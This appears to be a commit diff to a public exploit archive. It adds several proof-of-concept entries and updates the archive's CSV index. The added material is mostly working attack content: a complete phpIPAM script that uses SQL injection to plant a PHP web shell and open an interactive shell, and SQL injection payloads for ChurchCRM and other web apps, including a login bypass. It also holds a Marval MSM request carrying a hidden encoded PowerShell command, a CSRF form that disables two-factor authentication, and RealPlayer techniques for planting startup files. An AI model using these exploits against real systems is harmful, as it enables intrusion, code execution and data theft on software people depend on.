localIP = sys.argv[sys.argv.index(args[4]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")
exit()
try:
if "-" in sys.argv[sys.argv.index(args[4]) + 2]:
raise
localPort = sys.argv[sys.argv.index(args[4]) + 2]
except:
print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")
exit()
exploit(exploitMode,targetSess)
# Set custom command mode from CLI, if specified
elif args[5] in sys.argv:
exploitMode = "command"
try:
if sys.argv[sys.argv.index(args[5]) + 1] in args:
raise
command = sys.argv[sys.argv.index(args[5]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}")
exit()
exploit(exploitMode,targetSess)
# Set web shell mode from CLI, if specified
elif args[6] in sys.argv:
exploitMode = "web"
try:
if sys.argv[sys.argv.index(args[6]) + 1] in args:
raise
if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]:
webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php"
else:
webName = sys.argv[sys.argv.index(args[6]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}")
exit()
exploit(exploitMode,targetSess)
# Run with default web shell mode if no mode is specified
else:
exploit(exploitMode,targetSess)

88
exploits/php/webapps/50963.py Executable file
View file

@ -0,0 +1,88 @@
# Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-04-10
# Exploit Author: Guilherme '@behiNdyk1' Alves
# Vendor Homepage: https://phpipam.net/
# Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5
# Version: 1.4.5
# Tested on: Linux Ubuntu 20.04.3 LTS
#!/usr/bin/env python3
import requests
import argparse
from sys import exit, argv
from termcolor import colored
banner = """
\n"""
print(banner)
parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE")
parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True)
parser.add_argument("-usr", type=str, help="Username to log in as", required=True)
parser.add_argument("-pwd", type=str, help="User's password", required=True)
parser.add_argument("-cmd", type=str, help="Command to execute", default="id")
parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html")
parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?")
args = parser.parse_args()
url = args.url
username = args.usr
password = args.pwd
command = args.cmd
path = args.path
# Validating url
if url.endswith("/"):
url = url[:-1]
if not url.startswith("http://") and not url.startswith("https://"):
print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))
exit()
def login(url, username, password):
"""Takes an username and a password and tries to execute a login (IPAM)"""
data = {
"ipamusername": username,
"ipampassword": password
}
print(colored(f"[...] Trying to log in as {username}", "blue"))
r = requests.post(f"{url}/app/login/login_check.php", data=data)
if "Invalid username or password" in r.text:
print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))
exit()
else:
print(colored("[+] Login successful!", "green"))
return str(r.cookies['phpipam'])
auth_cookie = login(url, username, password)
def exploit(url, auth_cookie, path, command):
print(colored("[...] Exploiting", "blue"))
vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"
data = {
"subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",
"bgp_id": "1"
}
cookies = {
"phpipam": auth_cookie
}
requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies)
test = requests.get(f"{url}/evil.php")
if test.status_code != 200:
return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red"))
if "--shell" in argv:
while True:
command = input("Shell> ")
r = requests.get(f"{url}/evil.php?cmd={command}")
print(r.text)
else:
print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))
r = requests.get(f"{url}/evil.php?cmd={command}")
print(f"\n\n[+] Output:\n{r.text}")
exploit(url, auth_cookie, path, command)

27
exploits/php/webapps/50965.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: ChurchCRM 4.4.5 - SQLi
# Exploit Author: nu11secur1ty
# Date: 05.11.2022
# Vendor: https://churchcrm.io/
# Software: https://github.com/ChurchCRM/CRM
# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325
## Description:
There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.
[+] Payloads:
```mysql
---
Parameter: PersonID (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE
(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: PersonID=1 AND (SELECT 7116 FROM
(SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack=
---
```

38
exploits/php/webapps/50966.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass
# Date: 12/06/2022
# Exploit Author: twseptian
# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip
# Version: v1.0
# Tested on: Kali Linux
# Vulnerable code
line 9 in file "/oahms/admin/login.php"
$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");
# Steps of reproduce:
1. Go to the admin login page http://localhost/oahms/admin/login.php
2. sqli payload: admin' or '1'='1';-- -
3. password: password
# Proof of Concept
POST /oahms/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://localhost
Connection: close
Referer: http://localhost/oahms/admin/login.php
Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=

38
exploits/windows/local/50953.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
# Google Dork: n/a
# Date: May 31, 2022
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://real.com/
# Software Link: http://real.com/
# Version: v.20.0.8.310
# Tested on: Windows 7, 8.1, 10
# CVE : N/A
Full PoC: https://github.com/Edubr2020/RealPlayer_G2_RCE
Real Player G2 Control component contains a remote code execution vulnerability because it allows 'javascript:' URIs to be passed as the argument, which
is usually not safe because in some scenarios could allow injection of script code in arbitrary domains (Universal Cross Site Scripting - uXSS) which can potentially be used to eg. steal cookies among other things.
By setting the 'URL' parameter to 'javascript:' URI and the 'target' parameter to an 'iframe' html element, it´s possible to cause javascript code to run in the context of a local error page displayed after using the very same
Control to navigate to an invalid URI such as 'mhtml:http://%SERVER%/frame.htm': when an 'mhtml:' URI is invoked by MS IE rendering engine, it expects an MHTML file with an extension whose MIME type is set to "message/rfc822", which is the
case for '.mht' files; '.htm' files have its MIME set to 'text/html' and thus IE will cancel loading the document and display a local error page (navigation cancelled). The local error page address is 'res://ieframe.dll/navcancl.htm' which belongs to the
'My computer' security zone of IE / Windows which allows reading of arbitrary local files and also arbitrary code execution by design.
Prohibiting the 'javascript:' URI in the control mitigates the issue.
The PoC uses the 'SYSMON' ActiveX control to plant an HTA file to the user´s startup folder, which will be executed on next logon or boot. an HTA file can contain code to eg. download or extract an embedded EXE file and run it.
The PoC assumes Real Player has its current working directory set to a subdirectory of the user´s home directory. Upon downloading files using eg. web browsers, they will be downloaded to the user´s 'Downloads' folder by default, so we don´t need to retrieve the Windows user name
to be able to plant the HTA file in the startup folder. This is just for convenience purposes as it´s possible to retrieve this info through a variety of ways, including the MS Web Browser ActiveX.
Vulnerability can be exploited by opening a Real Player playlist file such as RAM files.
To reproduce the issue, do the following:
a) Setup a web server
b) on the web server root directory, extract the "RP_G2" folder to it.
c) open the just extracted "RP_G2" folder and then open the following files in a text editor:
"poc.htm", "sm_rpx.js", "start.ram". Just replace every occurance of the string %SERVER% with the actual web server´s IP address (on each of the files)
d) make sure the web server is accessible and all involved files too. on MS IIS web server you may need to add a new extension and associate it with a MIME type, so do it to associate the .RAM extension with the MIME "audio/x-pn-realaudio".
e) on the client side (victim), open the web browser and download the "start.ram" file (or can be accessed eg. using a URL protocol such as 'rtsp:') and open it. You should see an HTA file being planted in the user´s startup folder after a few seconds.
Note: to open startup folder do this: open the "Run" menu and then type:
shell:Startup

29
exploits/windows/local/50954.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
# Google Dork: n/a
# Date: May 31, 2022
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://real.com/
# Software Link: http://real.com/
# Version: ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309
# Tested on: Windows 7, 8.1, 10
# CVE : N/A
PoC: https://github.com/Edubr2020/RP_Import_RCE/raw/main/RP_Import_RCE.zip
vídeo: https://youtu.be/CONlijEgDLc
Real Player uses Microsoft Internet Explorer functionality and exposes properties and methods through a special mean which is application specific:
The 'external' object and it exposes several custom methods and properties.
The 'Import()' method is handled in unsafe way regarding the 'Copy to My Music' parameter, which allows for arbitrary file types downloading
which could be unsafe as only audio/image/video types should be allowed to download to the user´s disk. Additionally it does not properly sanitize file paths
allowing planting of arbitrary files on arbitrary locations. Even though it displays an error because it cannot render the downloaded file, the file remains until the user
closes the dialog box. Additionally when opening new windows, Real Player looks for an old, obsolete IE library (shdoclc.dll), which can also be abused to run code automatically without needing to wait
until reboot (true when file is planted in 'startup' folder).
The attacker needs to host the files to be copied/downloaded in an SMB or WebDav share.
The directory 'appdata' must be placed in the share's root.
The PoC will drop 'shdoclc.dll' (has simple code to run 'cmd.exe' at 'DllMain()' for demonstration purposes) to the user´s 'windowsapps' folder and 'write.exe' to 'startup' folder, so it works universally (any Windows version from at least XP up to 11)
tested on RP ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309

29
exploits/windows/local/50959.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path
# Date: 2022-06-06
# Exploit Author: Ali Alipour
# Vendor Homepage: https://support.hp.com/us-en/document/c01998934
# Software Link: https://support.hp.com/us-en/drivers/selfservice/hp-laserjet-pro-m1212nf-multifunction-printer-series/3965847
# Version: 20180815_1
# Tested on: Windows 10 Pro x64
# CVE : N/A
# Service info:
C:\Users\Wr3ak>sc qc "HPM1210RcvFaxSrvc"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HPM1210RcvFaxSrvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\HP\HP LaserJet M1210 MFP Series\ReceiveFaxUtility.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HP LaserJet Professional M1210 MFP Series Receive Fax Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
The local user able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

28
exploits/windows/remote/50956.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
# Date: 27/5/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.marvalnorthamerica.com/
# Software Link: https://www.marvalnorthamerica.com/
# Version: v14.19.0.12476
# Tested on: Windows
# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rce
POST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2
Host: MSMHandler.io
Cookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 456
Origin: https://MSMHandler.io
Dnt: 1
Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
type=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true

18
exploits/windows/remote/50957.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
# Date: 27/5/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.marvalnorthamerica.com/
# Software Link: https://www.marvalnorthamerica.com/
# Version: v14.19.0.12476
# Tested on: Windows
# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY
# 2FA Bypass:
<html>
<body>
<form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">
<input type="submit" value="Submit request" />
</form>
</body>
</html>

57
exploits/windows/remote/50958.txt Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: Virtua Software Cobranca 12S - SQLi
# Shodan Query: http.favicon.hash:876876147
# Date: 13/08/2021
# Exploit Author: Luca Regne
# Vendor Homepage: https://www.virtuasoftware.com.br/
# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe
# Version: 12S
# Tested on: Windows Server 2019
# CVE : CVE-2021-37589
------------------------------------------------------------------------
## Description
A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter.
## Request PoC
```
POST /controller/login.php?acao=autenticar HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 37
Connection: close
Cookie: origem_selecionado=; PHPSESSID=
idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario
```
This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error.
```
POST /controller/login.php?acao=autenticar HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 37
Connection: close
Cookie: origem_selecionado=; PHPSESSID=
idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario
```
## Exploit
Save the request from burp to file
```bash
python3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent
```

16
files_exploits.csv
View file

@ -11486,6 +11486,9 @@ id,file,description,date,author,type,platform,port
50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",1970-01-01,AkuCyberSec,local,windows,
50911,exploits/linux/local/50911.py,"ExifTool 12.23 - Arbitrary Code Execution",1970-01-01,UNICORD,local,linux,
50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",1970-01-01,"Netanel Cohen",local,windows,
50953,exploits/windows/local/50953.txt,"Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
50954,exploits/windows/local/50954.txt,"Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
50959,exploits/windows/local/50959.txt,"HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path",1970-01-01,"Ali Alipour",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18701,6 +18704,12 @@ id,file,description,date,author,type,platform,port
50948,exploits/hardware/remote/50948.py,"Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",1970-01-01,"Bryan Leong",remote,hardware,
50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",1970-01-01,LiquidWorm,remote,hardware,
50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",1970-01-01,"Ahmed Alroky",remote,hardware,
50956,exploits/windows/remote/50956.txt,"Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Momen Eldawakhly",remote,windows,
50958,exploits/windows/remote/50958.txt,"Virtua Software Cobranca 12S - SQLi",1970-01-01,"Luca Regne",remote,windows,
50957,exploits/windows/remote/50957.txt,"Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Momen Eldawakhly",remote,windows,
50960,exploits/hardware/remote/50960.py,"Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Filip Carlsson",remote,hardware,
50962,exploits/hardware/remote/50962.py,"TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Tomas Melicher",remote,hardware,
50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -45015,3 +45024,10 @@ id,file,description,date,author,type,platform,port
50947,exploits/php/webapps/50947.txt,"Microweber CMS 1.2.15 - Account Takeover",1970-01-01,"Manojkumar J",webapps,php,
50951,exploits/php/webapps/50951.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Sanjay Singh",webapps,php,
50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",1970-01-01,"Fellipe Oliveira",webapps,java,
50955,exploits/multiple/webapps/50955.txt,"Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)",1970-01-01,"Andrea Intilangelo",webapps,multiple,
50961,exploits/php/webapps/50961.py,"Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UNICORD,webapps,php,
50963,exploits/php/webapps/50963.py,"phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Guilherme Alves",webapps,php,
50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
50966,exploits/php/webapps/50966.txt,"Old Age Home Management System 1.0 - SQLi Authentication Bypass",1970-01-01,twseptian,webapps,php,
50967,exploits/hardware/webapps/50967.txt,"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,
50968,exploits/hardware/webapps/50968.txt,"SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,

Can't render this file because it is too large.